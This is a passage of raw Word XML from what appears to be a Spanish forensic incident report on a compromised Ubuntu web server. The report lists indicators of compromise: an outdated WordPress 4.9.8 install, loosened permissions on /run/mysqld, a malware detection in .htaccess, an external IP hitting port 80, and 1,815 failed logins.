    <w:p w14:paraId="2FBA1639" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo al comando </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_dmesg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se han detectado las siguientes acciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F347E0" w14:textId="2DCDC849" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>einicio del servido</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60191492" w14:textId="3926D709" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rein</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">icio del servicio </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ournal</w:t>
      </w:r>
      <w:r w:rsidR="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3707B8" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 denegaciones</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acción sobre el</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servicio SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03300027" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="00B13892" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Posible entrada y alteración no deseada a través del servicio SQL en el servidor, esta acción se ha realizado al menos en 3 ocasiones que se tiene constancia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638297A1" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="00B13892" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reinicio del Servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> posterior a estas acciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FFF5ED" w14:textId="00BA71B3" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinicio del servicio </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ournal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> posterior a estas acciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A47EF" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="000A2042" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se encuentran han detectado la ejecución de comandos que exponen a riesgos al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF67690" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="000A2042" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2042">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Concede permisos a cualquier usuario o no del sistema a actuar sobre </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/run/mysqld</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2042">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F4AE2" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="00941895" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2042">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Añade un </w:t>
      </w:r>
      <w:r w:rsidRPr="00941895">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">correo </w:t>
      </w:r>
      <w:hyperlink r:id="rId268" w:tooltip="mailto:test12312321@mailinator.com" w:history="1">
        <w:r w:rsidRPr="005579DA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="lightGray"/>
          </w:rPr>
          <w:t>test12312321@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00941895">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F586809" w14:textId="1E3368F5" w:rsidR="00BB78C7" w:rsidRPr="000A2042" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2042">
        <w:t>Usa una la versi</w:t>
      </w:r>
      <w:r>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2042">
        <w:t xml:space="preserve">n 4.9.8. de WordPress que tiene </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">desde el </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CVE (Common Vulnerabilities and Exposures): Lista de registros de información pública sobre vulnerabilidades de seguridad.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-2018-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20147</w:t>
      </w:r>
      <w:r w:rsidRPr="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasta </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018</w:t>
      </w:r>
      <w:r w:rsidRPr="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-20153</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarados</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2042">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14 de diciembre de 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C1A5A" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se detectan acciones no usuales por parte del UserId33 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABDCEA" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El único Usuario registrado en el servidor es el usuario </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446DE45" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> solo se observan los siguientes archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9A7B4" w14:textId="3AE9D239" w:rsidR="00BB78C7" w:rsidRPr="00AF0A8A" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>accelerated-mobile-pages.0.9.97.19.zip</w:t>
      </w:r>
      <w:r w:rsidR="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33656E" w14:textId="4BBF53DA" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>wordpress-4.9.8.tar.gz</w:t>
      </w:r>
      <w:r w:rsidR="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6F9E9" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analizándose en VirusTotal, se detecta virus en </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0A8A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/var/www/html/.htaccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6E4E63" w14:textId="63969094" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se detecta una conexión establecida con la IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>18.195.165.56:41529</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> atacando al servidor web por el puerto 80 a través del proceso </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>apache2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con Id de proceso </w:t>
      </w:r>
      <w:r w:rsidRPr="00941895">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>19952</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C217A2" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="00AF0A8A" w:rsidRDefault="00BB78C7" w:rsidP="00BB78C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0A8A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A continuación, se enumeran los distintos indicio y elementos detectados en la captura de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0A8A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memoria</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del Disco Duro </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0A8A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>del dispositivo investigado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4911A2BA" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se observa que el servidor ha recibido un total de 1815 intentos fallidos de inicio de sesión entre el </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>31 de diciembre de 2018 a las 06:29:18 UTC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y el </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>03 de enero de 2019 a las 04:24:20 UTC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Eso da una media de un fallo de inicio de sesión por cada minuto y 55 segundos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449CA398" w14:textId="55263826" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En el servidor de Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
